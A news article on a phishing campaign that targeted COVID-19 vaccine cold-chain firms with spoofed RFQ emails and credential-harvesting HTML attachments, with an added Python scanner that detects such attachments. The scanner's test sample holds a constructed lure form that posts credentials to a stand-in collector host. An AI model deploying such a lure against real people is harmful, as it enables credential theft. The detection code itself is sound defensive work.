Phishing campaign threatens coronavirus vaccine supply chain

A calculated cybercriminal operation is targeting companies in the coronavirus vaccine supply chain with phishing emails that appear to be designed to steal sensitive user credentials, IBM Security X-Force said in a report released Thursday. The targeted organizations are all associated with a COVID-19 cold chain, the part of the overall supply chain that keeps vaccines at safe cold temperatures during storage and transportation.


Spotted this past September, the phishing campaign deploys emails spoofing a business executive from Haier Biomedical, a legitimate member company of the COVID-19 vaccine supply chain and reportedly the world's only complete cold chain provider.

Aimed at executives at companies in the energy, manufacturing, website creation, and internet security sectors, the emails seem designed to capture the victim's credentials, possibly to gain network access and sensitive information related to the distribution of the COVID-19 vaccine.

"As we all await vaccines for COVID, it goes without saying that disruption to cold-chain supply operations would be disheartening," Stephen Banda, senior manager for security solutions at security firm Lookout, told TechRepublic. "Unfortunately, the more expansive the supply chain, the greater the third-party risk to supply-chain operations. Manufacturers rely on a web of external workers, contractors, and service partners to maintain equipment, package products, manage waste, ensure worker safety, and much more."

The phishing emails contain phony requests for quotation (RFQ) related to the Cold Chain Equipment Optimization Platform (CCEOP) program, an initiative launched in 2015 by Gavi, the Vaccine Alliance, and other partners to strengthen vaccine supply chains and ensure a smooth medical response to outbreaks of infectious diseases. The emails carry malicious HTML attachments that, when opened, prompt the user to enter their credentials to view a file.
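One defensive check this lure suggests, added here as an example and not taken from the X-Force report or the page: a mail-gateway style scan that parses each HTML attachment and flags sign-in forms whose credentials would be posted outside the sender's own domain. The sample message, sender address and collector host are constructed placeholders.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class CredFormScanner(HTMLParser):
    # Collects form actions and counts password fields in one HTML document
    def __init__(self):
        super().__init__()
        self.form_actions, self.password_inputs = [], 0
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1

def score_html_attachment(html, sender_domain):
    """Return (verdict, reasons) for one HTML attachment body."""
    p = CredFormScanner()
    p.feed(html)
    reasons = []
    if p.password_inputs:
        reasons.append(f"{p.password_inputs} password field(s) inside an HTML attachment")
    for action in p.form_actions:
        host = (urlparse(action).hostname or "").lower()
        if host and host != sender_domain and not host.endswith("." + sender_domain):
            reasons.append(f"form submits credentials to external host {host}")
    return ("suspicious" if reasons else "clean", reasons)

def scan_message(raw):
    # Walk the MIME parts of a raw message and score every HTML attachment
    msg = message_from_bytes(raw, policy=policy.default)
    sender_domain = msg["From"].addresses[0].domain.lower()
    findings = {}
    for part in msg.walk():
        name = part.get_filename() or ""
        if part.get_content_disposition() == "attachment" and name.lower().endswith((".html", ".htm")):
            body = part.get_payload(decode=True).decode("utf-8", "replace")
            findings[name] = score_html_attachment(body, sender_domain)
    return findings

def build_sample():
    # Constructed sample lure, not the real campaign's message: RFQ text plus an HTML sign-in form
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "exec@example.com", "ops@example.net", "RFQ: CCEOP cold chain equipment"
    m.set_content("Please open the attached RFQ and sign in to view the document.")
    lure = ('<html><body><form action="https://collector.example.org/auth" method="post">Sign in to view '
            'the file <input name="user"><input type="password" name="pass"></form></body></html>')
    m.add_attachment(lure, subtype="html", filename="RFQ_CCEOP.html")
    return m.as_bytes()
```

A form that posts back to the sender's own domain still raises the password-field reason, so the external-host reason is what separates a lure like this one from a legitimate internal portal link.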

After obtaining account credentials, the attackers could gain access to internal communications. Such communications can include the process and plans to distribute a COVID-19 vaccine, with details on the underlying infrastructure to be used by governments to distribute a vaccine as well as the methods used by vendors to supply it. Moving laterally through an infiltrated network could also give the criminals the ability to conduct cyber espionage and capture further confidential information for future operations.

Though the identity of the people behind this campaign is unknown, typical cybercriminals wouldn't have the time or resources to pull off such a complex operation. Based on the nature of the attack, X-Force believes the true culprit to be a nation-state. Also unknown is whether the campaign has been successful. However, given the critical role that Haier Biomedical plays in vaccine transportation, the intended victims may be more likely to respond to the phishing emails without scrutinizing their legitimacy.

"Let's first acknowledge there is no breach here that I can see," Chris Morales, head of security analytics at security firm Vectra, told TechRepublic. "It is a high alert for a targeted phishing campaign against the COVID vaccine supply chain. As the cure for COVID is essentially the most valuable thing in the world in 2020, and attackers always go for what is of value, this was a sort of an inevitable scenario."

Referencing X-Force's report, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued its own advisory alerting organizations involved in Operation Warp Speed (OWS) to review the findings.

To help protect organizations from sophisticated phishing campaigns and other attacks, X-Force offers the following recommendations:

Lookout's Banda also provided his own advice aimed at the mobile workforce.

"Cold-chain supply organizations need to adopt a heightened awareness and deeper understanding of phishing attacks," Banda said. "The first lesson is that phishing is not just happening in email on your laptop or desktop. Attackers know that supply-chain operators depend on smartphones and tablets to monitor supply-chain operations and provide key inputs. They also know that users inherently trust their smartphones and tablets and that the smaller form factor makes it more difficult to spot a phishing attack."
